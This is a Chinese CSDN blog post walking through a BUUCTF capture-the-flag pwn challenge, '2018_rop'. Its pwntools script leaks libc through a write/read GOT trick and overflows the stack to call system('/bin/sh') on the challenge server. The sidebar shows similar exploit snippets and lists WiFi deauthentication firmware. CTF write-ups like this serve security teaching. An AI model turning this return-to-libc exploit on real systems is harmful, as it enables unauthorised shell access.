[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop

最新推荐文章于 2023-01-15 20:40:36 发布
最新推荐文章于 2023-01-15 20:40:36 发布
阅读量436 收藏
点赞数 1
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113792205
版权

[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop

  • 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop
  • 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

exploit

from pwn import *
from LibcSearcher import *
elf = ELF("./2018_rop")
p = remote("node3.buuoj.cn",28628)
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
main_addr = 0x080484C6
payload = 'a' * (0x88 + 0x4) 
payload += p32(write_plt) + p32(main_addr)
payload += p32(1) + p32(read_got) + p32(8)
p.sendline(payload)
read_addr = u32(p.recv(4))
print hex(read_addr)
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = 'a' * (0x88 + 0x4)
payload += p32(sys_addr) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 826
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 704
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 356
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 229
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
BUUCTFPWN铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 343
BUUCTFPWN铁人三项(第五赛区)_2018_rop题解
铁人三项(第五赛区)_2018_rop
、moddemod
06-20 623
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './2018_rop' p = process(proc_name) p = remote('node3.buuoj.cn', 25414) elf = ELF(proc_name) write_plt = elf.plt['write'] read_.
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 504
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
buuctf 铁人三项(第五赛区)_2018_rop
carol2358的博客
04-26 385
常规的32位泄漏libc,比较蛋痛的是我常规的写法不知道为什么出错,以后要多注意recv到的东西 exp: from pwn import * from LibcSearcher import * local_file = './2018_rop' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 ...
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop 1(ret2libc3)
空城惜梦的博客
06-04 1030
@[TOC]( [PWN] BUUCTF 铁人三项(第五赛区)_2018_rop)
[PWN]铁人三项(第五赛区)_2018_rop
LDX的博客
11-27 241
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 158
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 7万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值